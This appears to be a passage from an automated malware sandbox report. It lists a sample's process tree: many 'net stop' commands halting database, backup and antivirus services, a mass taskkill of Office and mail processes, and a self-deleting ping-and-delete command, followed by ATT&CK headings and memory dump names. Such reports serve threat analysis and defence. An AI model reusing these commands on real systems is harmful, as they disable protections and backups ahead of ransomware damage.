      • C:\Windows\system32\net.exe
        net stop MSSQLFDLauncher $ TPS /y
        PID:1036
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSSQLFDLauncher $ TPS /y
          PID:1088
      • C:\Windows\system32\net.exe
        net stop MSSQLFDLauncher $ TPSAMA /y
        PID:1092
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSSQLFDLauncher $ TPSAMA /y
          PID:1704
      • C:\Windows\system32\net.exe
        net stop MSSQLSERVER /y
        PID:1104
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSSQLSERVER /y
          PID:824
      • C:\Windows\system32\net.exe
        net stop MSSQLServerADHelper100 /y
        PID:1700
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
          PID:1488
      • C:\Windows\system32\net.exe
        net stop MSSQLServerOLAPService /y
        PID:1524
      • C:\Windows\system32\net.exe
        net stop MySQL80 /y
        PID:1712
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MySQL80 /y
          PID:828
      • C:\Windows\system32\net.exe
        net stop MySQL57 /y
        PID:1560
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MySQL57 /y
          PID:1080
      • C:\Windows\system32\net.exe
        net stop ntrtscan /y
        PID:1576
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop ntrtscan /y
          PID:1908
      • C:\Windows\system32\net.exe
        net stop OracleClientCache80 /y
        PID:1980
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop OracleClientCache80 /y
          PID:1520
      • C:\Windows\system32\net.exe
        net stop PDVFSService /y
        PID:1664
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop PDVFSService /y
          PID:1068
      • C:\Windows\system32\net.exe
        net stop POP3SVC /y
        PID:980
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop POP3SVC /y
          PID:1736
      • C:\Windows\system32\net.exe
        net stop ReportServer /y
        PID:1892
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop ReportServer /y
          PID:912
      • C:\Windows\system32\net.exe
        net stop ReportServer $ SQL_2008 /y
        PID:1268
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop ReportServer $ SQL_2008 /y
          PID:900
      • C:\Windows\system32\net.exe
        net stop ReportServer $ SYSTEM_BGC /y
        PID:1676
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop ReportServer $ SYSTEM_BGC /y
          PID:1620
      • C:\Windows\system32\net.exe
        net stop ReportServer $ TPS /y
        PID:1616
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop ReportServer $ TPS /y
          PID:1508
      • C:\Windows\system32\net.exe
        net stop ReportServer $ TPSAMA /y
        PID:1660
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop ReportServer $ TPSAMA /y
          PID:2028
      • C:\Windows\system32\net.exe
        net stop RESVC /y
        PID:1612
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop RESVC /y
          PID:1464
      • C:\Windows\system32\net.exe
        net stop sacsvr /y
        PID:576
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop sacsvr /y
          PID:1728
      • C:\Windows\system32\net.exe
        net stop SamSs /y
        PID:268
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SamSs /y
          PID:1060
      • C:\Windows\system32\net.exe
        net stop SAVAdminService /y
        PID:1128
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SAVAdminService /y
          PID:1256
      • C:\Windows\system32\net.exe
        net stop ????????? /y
        PID:1288
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop ????????? /y
          PID:660
      • C:\Windows\system32\net.exe
        net stop SDRSVC /y
        PID:920
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SDRSVC /y
          PID:1244
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop swi_update /y
            PID:1288
      • C:\Windows\system32\net.exe
        net stop SepMasterService /y
        PID:688
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SepMasterService /y
          PID:1416
      • C:\Windows\system32\net.exe
        net stop ShMonitor /y
        PID:1404
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop ShMonitor /y
          PID:568
      • C:\Windows\system32\net.exe
        net stop Smcinst /y
        PID:976
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop Smcinst /y
          PID:1564
      • C:\Windows\system32\net.exe
        net stop SmcService /y
        PID:1688
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SmcService /y
          PID:1904
      • C:\Windows\system32\net.exe
        net stop SMTPSVC /y
        PID:1840
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SMTPSVC /y
          PID:1184
      • C:\Windows\system32\net.exe
        net stop SNAC /y
        PID:2024
      • C:\Windows\system32\net.exe
        net stop SntpService /y
        PID:1536
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SntpService /y
          PID:1692
      • C:\Windows\system32\net.exe
        net stop sophossps /y
        PID:1088
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop sophossps /y
          PID:1036
      • C:\Windows\system32\net.exe
        net stop SQLAgent $ BKUPEXEC /y
        PID:1704
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SQLAgent $ BKUPEXEC /y
          PID:1092
      • C:\Windows\system32\net.exe
        net stop SQLAgent $ ECWDB2 /y
        PID:824
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SQLAgent $ ECWDB2 /y
          PID:1104
      • C:\Windows\system32\net.exe
        net stop SQLAgent $ PRACTTICEBGC /y
        PID:1488
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SQLAgent $ PRACTTICEBGC /y
          PID:1700
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop ekrn /y
          PID:1700
      • C:\Windows\system32\net.exe
        net stop SQLAgent $ PRACTTICEMGT /y
        PID:1532
      • C:\Windows\system32\net.exe
        net stop SQLAgent $ PROFXENGAGEMENT /y
        PID:828
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SQLAgent $ PROFXENGAGEMENT /y
          PID:1712
      • C:\Windows\system32\net.exe
        net stop SQLAgent $ SBSMONITORING /y
        PID:1080
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SQLAgent $ SBSMONITORING /y
          PID:1560
      • C:\Windows\system32\net.exe
        net stop SQLAgent $ SHAREPOINT /y
        PID:1908
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SQLAgent $ SHAREPOINT /y
          PID:1576
      • C:\Windows\system32\net.exe
        net stop SQLAgent $ SQL_2008 /y
        PID:1520
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SQLAgent $ SQL_2008 /y
          PID:1980
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop klnagent /y
          PID:1980
      • C:\Windows\system32\net.exe
        net stop SQLAgent $ SYSTEM_BGC /y
        PID:1068
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SQLAgent $ SYSTEM_BGC /y
          PID:1664
      • C:\Windows\system32\net.exe
        net stop SQLAgent $ TPS /y
        PID:1736
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SQLAgent $ TPS /y
          PID:980
      • C:\Windows\system32\net.exe
        net stop SQLAgent $ TPSAMA /y
        PID:912
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SQLAgent $ TPSAMA /y
          PID:1892
      • C:\Windows\system32\net.exe
        net stop SQLAgent $ VEEAMSQL2008R2 /y
        PID:900
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SQLAgent $ VEEAMSQL2008R2 /y
          PID:1268
      • C:\Windows\system32\net.exe
        net stop SQLAgent $ VEEAMSQL2012 /y
        PID:1620
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SQLAgent $ VEEAMSQL2012 /y
          PID:1676
      • C:\Windows\system32\net.exe
        net stop SQLBrowser /y
        PID:1508
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SQLBrowser /y
          PID:1616
      • C:\Windows\system32\net.exe
        net stop SQLSafeOLRService /y
        PID:2028
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SQLSafeOLRService /y
          PID:1660
      • C:\Windows\system32\net.exe
        net stop SQLSERVERAGENT /y
        PID:1464
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SQLSERVERAGENT /y
          PID:1612
      • C:\Windows\system32\net.exe
        net stop SQLTELEMETRY /y
        PID:1728
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SQLTELEMETRY /y
          PID:576
      • C:\Windows\system32\net.exe
        net stop SQLTELEMETRY $ ECWDB2 /y
        PID:1060
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SQLTELEMETRY $ ECWDB2 /y
          PID:268
      • C:\Windows\system32\net.exe
        net stop SQLWriter /y
        PID:1256
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SQLWriter /y
          PID:1128
      • C:\Windows\system32\net.exe
        net stop SstpSvc /y
        PID:1084
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SstpSvc /y
          PID:1740
      • C:\Windows\system32\net.exe
        net stop svcGenericHost /y
        PID:1472
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop svcGenericHost /y
          PID:624
      • C:\Windows\system32\net.exe
        net stop swi_filter /y
        PID:240
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop swi_filter /y
          PID:676
      • C:\Windows\system32\net.exe
        net stop swi_service /y
        PID:1408
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop swi_service /y
          PID:428
      • C:\Windows\system32\net.exe
        net stop swi_update_64 /y
        PID:512
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop swi_update_64 /y
          PID:1460
      • C:\Windows\system32\net.exe
        net stop TmCCSF /y
        PID:336
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop TmCCSF /y
          PID:1624
      • C:\Windows\system32\net.exe
        net stop tmlisten /y
        PID:1264
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop tmlisten /y
          PID:420
      • C:\Windows\system32\net.exe
        net stop TrueKey /y
        PID:2024
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop TrueKey /y
          PID:1692
      • C:\Windows\system32\net.exe
        net stop TrueKeyScheduler /y
        PID:1824
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop TrueKeyScheduler /y
          PID:1696
      • C:\Windows\system32\net.exe
        net stop TrueKeyServiceHelper /y
        PID:1544
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
          PID:1064
      • C:\Windows\system32\net.exe
        net stop UI0Detect /y
        PID:1936
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop UI0Detect /y
          PID:1556
      • C:\Windows\system32\net.exe
        net stop VeeamBackupSvc /y
        PID:1720
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop VeeamBackupSvc /y
          PID:1044
      • C:\Windows\system32\net.exe
        net stop VeeamBrokerSvc /y
        PID:860
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop VeeamBrokerSvc /y
          PID:1916
      • C:\Windows\system32\net.exe
        net stop VeeamCatalogSvc /y
        PID:1912
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop VeeamCatalogSvc /y
          PID:1992
      • C:\Windows\system32\net.exe
        net stop VeeamCloudSvc /y
        PID:1984
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop VeeamCloudSvc /y
          PID:1356
      • C:\Windows\system32\net.exe
        net stop VeeamDeploymentService /y
        PID:1732
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop VeeamDeploymentService /y
          PID:852
      • C:\Windows\system32\net.exe
        net stop VeeamDeploySvc /y
        PID:916
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop VeeamDeploySvc /y
          PID:856
      • C:\Windows\system32\net.exe
        net stop VeeamEnterpriseManagerSvc /y
        PID:1760
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
          PID:1272
      • C:\Windows\system32\net.exe
        net stop VeeamMountSvc /y
        PID:1652
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop VeeamMountSvc /y
          PID:996
      • C:\Windows\system32\net.exe
        net stop VeeamNFSSvc /y
        PID:1608
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop VeeamNFSSvc /y
          PID:1148
      • C:\Windows\system32\net.exe
        net stop VeeamRESTSvc /y
        PID:1768
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop VeeamRESTSvc /y
          PID:1120
      • C:\Windows\system32\net.exe
        net stop VeeamTransportSvc /y
        PID:520
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop VeeamTransportSvc /y
          PID:1144
      • C:\Windows\system32\net.exe
        net stop W3svc /y
        PID:544
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop W3svc /y
          PID:1588
      • C:\Windows\system32\net.exe
        net stop wbengine /y
        PID:776
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop wbengine /y
          PID:1484
      • C:\Windows\system32\net.exe
        net stop WRSVC /y
        PID:288
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop WRSVC /y
          PID:560
      • C:\Windows\system32\net.exe
        net stop MSSQL $ VEEAMSQL2008R2 /y
        PID:1516
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSSQL $ VEEAMSQL2008R2 /y
          PID:1456
      • C:\Windows\system32\net.exe
        net stop SQLAgent $ VEEAMSQL2008R2 /y
        PID:1468
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SQLAgent $ VEEAMSQL2008R2 /y
          PID:756
      • C:\Windows\system32\net.exe
        net stop VeeamHvIntegrationSvc /y
        PID:1412
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
          PID:1420
      • C:\Windows\system32\net.exe
        net stop swi_update /y
        PID:1244
      • C:\Windows\system32\net.exe
        net stop SQLAgent $ CXDB /y
        PID:1416
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SQLAgent $ CXDB /y
          PID:920
      • C:\Windows\system32\net.exe
        net stop SQLAgent $ CITRIX_METAFRAME /y
        PID:568
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SQLAgent $ CITRIX_METAFRAME /y
          PID:688
      • C:\Windows\system32\net.exe
        net stop SQL ???????? /y
        PID:1564
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SQL ???????? /y
          PID:1404
      • C:\Windows\system32\net.exe
        net stop MSSQL $ PROD /y
        PID:1904
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSSQL $ PROD /y
          PID:976
      • C:\Windows\system32\net.exe
        net stop Zoolz 2 ?????? /y
        PID:1184
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop Zoolz 2 ?????? /y
          PID:1688
      • C:\Windows\system32\net.exe
        net stop MSSQLServerADHelper /y
        PID:1572
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSSQLServerADHelper /y
          PID:1840
      • C:\Windows\system32\net.exe
        net stop SQLAgent $ PROD /y
        PID:1684
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SQLAgent $ PROD /y
          PID:1096
      • C:\Windows\system32\net.exe
        net stop msftesql $ PROD /y
        PID:1088
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop msftesql $ PROD /y
          PID:1036
      • C:\Windows\system32\net.exe
        net stop NetMsmqActivator /y
        PID:1704
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop NetMsmqActivator /y
          PID:1092
      • C:\Windows\system32\net.exe
        net stop EhttpSrv /y
        PID:824
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop EhttpSrv /y
          PID:1104
      • C:\Windows\system32\net.exe
        net stop ekrn /y
        PID:1488
      • C:\Windows\system32\net.exe
        net stop ESHASRV /y
        PID:1532
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop ESHASRV /y
          PID:1524
      • C:\Windows\system32\net.exe
        net stop MSSQL $ SOPHOS /y
        PID:828
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSSQL $ SOPHOS /y
          PID:1712
      • C:\Windows\system32\net.exe
        net stop SQLAgent $ SOPHOS /y
        PID:1080
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SQLAgent $ SOPHOS /y
          PID:1560
      • C:\Windows\system32\net.exe
        net stop AVP /y
        PID:1908
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop AVP /y
          PID:1576
      • C:\Windows\system32\net.exe
        net stop klnagent /y
        PID:1520
      • C:\Windows\system32\net.exe
        net stop MSSQL $ SQLEXPRESS /y
        PID:1068
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop MSSQL $ SQLEXPRESS /y
          PID:1664
      • C:\Windows\system32\net.exe
        net stop SQLAgent $ /y
        PID:1736
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SQLAgent $ /y
          PID:980
      • C:\Windows\system32\net.exe
        net stop SQLEXPRESS /y
        PID:912
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop SQLEXPRESS /y
          PID:1892
      • C:\Windows\system32\net.exe
        net stop wbengine /y
        PID:900
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop wbengine /y
          PID:1268
      • C:\Windows\system32\net.exe
        net stop kavfsslp /y
        PID:1620
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop kavfsslp /y
          PID:1676
      • C:\Windows\system32\net.exe
        net stop KAVFSGT /y
        PID:1508
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop KAVFSGT /y
          PID:1616
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /f /im zoolz.exe >NUL 2> 1 /im agntsvc.exe >NUL 2> 1 /im dbeng50.exe >NUL 2> 1 /im dbsnmp.exe >NUL 2> 1 /im encsvc.exe >NUL 2> 1 /im excel.exe >NUL 2> 1 /im firefoxconfig.exe >NUL 2> 1 /im Infopath.exe >NUL 2> 1 /im isqlplussvc.exe >NUL 2> 1 /im msaccess.exe >NUL 2> 1 /im msftesql.exe >NUL 2> 1 /im mspub.exe >NUL 2> 1 /im mydesktopqos.exe >NUL 2> 1 /im mydesktopservice.exe >NUL 2> 1 /im mysqld.exe >NUL 2> 1 /im mysqld-nt.exe >NUL 2> 1 /im mysqld-opt.exe >NUL 2> 1 /im ocautoupds.exe >NUL 2> 1 /im ocomm.exe >NUL 2> 1 /im ocssd.exe >NUL 2> 1 /im onenote.exe >NUL 2> 1 /im oracle.exe >NUL 2> 1 /im outlook.exe >NUL 2> 1 /im powerpnt.exe >NUL 2> 1 /im sqbcoreservice.exe >NUL 2> 1 /im sqlagent.exe >NUL 2> 1 /im sqlbrowser.exe >NUL 2> 1 /im sqlservr.exe >NUL 2> 1 /im sqlwriter.exe >NUL 2> 1 /im steam.exe >NUL 2> 1 /im synctime.exe >NUL 2> 1 /im tbirdconfig.exe >NUL 2> 1 /im thebat.exe >NUL 2> 1 /im thebat64.exe >NUL 2> 1 /im thunderbird.exe >NUL 2> 1 /im visio.exe >NUL 2> 1 /im winword.exe >NUL 2> 1 /im wordpad.exe >NUL 2> 1 /im xfssvccon.exe >NUL 2> 1 /im tmlisten.exe >NUL 2> 1 /im PccNTMon.exe >NUL 2> 1 /im CNTAoSMgr.exe >NUL 2> 1 /im Ntrtscan.exe >NUL 2> 1 /im mbamtray.exe >NUL 2> 1 /im cmd.exe >NUL 2> 1
      PID:2028
      • C:\Windows\system32\taskkill.exe
        taskkill /f /im zoolz.exe /im agntsvc.exe /im dbeng50.exe /im dbsnmp.exe /im encsvc.exe /im excel.exe /im firefoxconfig.exe /im Infopath.exe /im isqlplussvc.exe /im msaccess.exe /im msftesql.exe /im mspub.exe /im mydesktopqos.exe /im mydesktopservice.exe /im mysqld.exe /im mysqld-nt.exe /im mysqld-opt.exe /im ocautoupds.exe /im ocomm.exe /im ocssd.exe /im onenote.exe /im oracle.exe /im outlook.exe /im powerpnt.exe /im sqbcoreservice.exe /im sqlagent.exe /im sqlbrowser.exe /im sqlservr.exe /im sqlwriter.exe /im steam.exe /im synctime.exe /im tbirdconfig.exe /im thebat.exe /im thebat64.exe /im thunderbird.exe /im visio.exe /im winword.exe /im wordpad.exe /im xfssvccon.exe /im tmlisten.exe /im PccNTMon.exe /im CNTAoSMgr.exe /im Ntrtscan.exe /im mbamtray.exe /im cmd.exe
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        PID:1612
    • C:\Windows\system32\cmd.exe
      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.exe"
      Deletes itself
      PID:1064
      • C:\Windows\system32\PING.EXE
        ping 1.1.1.1 -n 1 -w 3000
        Runs ping.exe
        PID:824
  • C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeIS /y
    PID:1092
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Defense Evasion
          Execution
            Exfiltration
              Impact
                Initial Access
                  Lateral Movement
                    Persistence
                      Privilege Escalation
                        Replay Monitor
                        00:00 00:00
                        Downloads
                        • memory/288-60-0x0000000000000000-mapping.dmp

                        • memory/420-107-0x0000000000000000-mapping.dmp

                        • memory/512-66-0x0000000000000000-mapping.dmp

                        • memory/520-56-0x0000000000000000-mapping.dmp

                        • memory/568-61-0x0000000000000000-mapping.dmp

                        • memory/568-100-0x0000000000000000-mapping.dmp

                        • memory/576-93-0x0000000000000000-mapping.dmp

                        • memory/660-57-0x0000000000000000-mapping.dmp

                        • memory/660-96-0x0000000000000000-mapping.dmp

                        • memory/676-68-0x0000000000000000-mapping.dmp

                        • memory/688-98-0x0000000000000000-mapping.dmp

                        • memory/688-59-0x0000000000000000-mapping.dmp

                        • memory/756-58-0x0000000000000000-mapping.dmp

                        • memory/824-110-0x0000000000000000-mapping.dmp

                        • memory/824-71-0x0000000000000000-mapping.dmp

                        • memory/828-114-0x0000000000000000-mapping.dmp

                        • memory/828-75-0x0000000000000000-mapping.dmp

                        • memory/852-79-0x0000000000000000-mapping.dmp

                        • memory/856-82-0x0000000000000000-mapping.dmp

                        • memory/916-85-0x0000000000000000-mapping.dmp

                        • memory/996-83-0x0000000000000000-mapping.dmp

                        • memory/1036-69-0x0000000000000000-mapping.dmp

                        • memory/1036-108-0x0000000000000000-mapping.dmp

                        • memory/1060-95-0x0000000000000000-mapping.dmp

                        • memory/1064-74-0x0000000000000000-mapping.dmp

                        • memory/1080-117-0x0000000000000000-mapping.dmp

                        • memory/1088-109-0x0000000000000000-mapping.dmp

                        • memory/1092-111-0x0000000000000000-mapping.dmp

                        • memory/1128-55-0x0000000000000000-mapping.dmp

                        • memory/1128-94-0x0000000000000000-mapping.dmp

                        • memory/1144-87-0x0000000000000000-mapping.dmp

                        • memory/1148-86-0x0000000000000000-mapping.dmp

                        • memory/1184-104-0x0000000000000000-mapping.dmp

                        • memory/1184-65-0x0000000000000000-mapping.dmp

                        • memory/1244-99-0x0000000000000000-mapping.dmp

                        • memory/1288-97-0x0000000000000000-mapping.dmp

                        • memory/1404-101-0x0000000000000000-mapping.dmp

                        • memory/1412-64-0x0000000000000000-mapping.dmp

                        • memory/1440-118-0x000007FEFBFE1000-0x000007FEFBFE3000-memory.dmp

                        • memory/1472-62-0x0000000000000000-mapping.dmp

                        • memory/1488-113-0x0000000000000000-mapping.dmp

                        • memory/1508-89-0x0000000000000000-mapping.dmp

                        • memory/1524-115-0x0000000000000000-mapping.dmp

                        • memory/1536-106-0x0000000000000000-mapping.dmp

                        • memory/1536-67-0x0000000000000000-mapping.dmp

                        • memory/1560-77-0x0000000000000000-mapping.dmp

                        • memory/1560-116-0x0000000000000000-mapping.dmp

                        • memory/1564-103-0x0000000000000000-mapping.dmp

                        • memory/1572-70-0x0000000000000000-mapping.dmp

                        • memory/1612-90-0x0000000000000000-mapping.dmp

                        • memory/1624-72-0x0000000000000000-mapping.dmp

                        • memory/1680-54-0x0000000000000000-mapping.dmp

                        • memory/1688-63-0x0000000000000000-mapping.dmp

                        • memory/1688-102-0x0000000000000000-mapping.dmp

                        • memory/1700-112-0x0000000000000000-mapping.dmp

                        • memory/1700-73-0x0000000000000000-mapping.dmp

                        • memory/1712-80-0x0000000000000000-mapping.dmp

                        • memory/1728-92-0x0000000000000000-mapping.dmp

                        • memory/1760-88-0x0000000000000000-mapping.dmp

                        • memory/1824-76-0x0000000000000000-mapping.dmp

                        • memory/1840-105-0x0000000000000000-mapping.dmp

                        • memory/1912-81-0x0000000000000000-mapping.dmp

                        • memory/1916-78-0x0000000000000000-mapping.dmp

                        • memory/1984-84-0x0000000000000000-mapping.dmp

                        • memory/2028-91-0x0000000000000000-mapping.dmp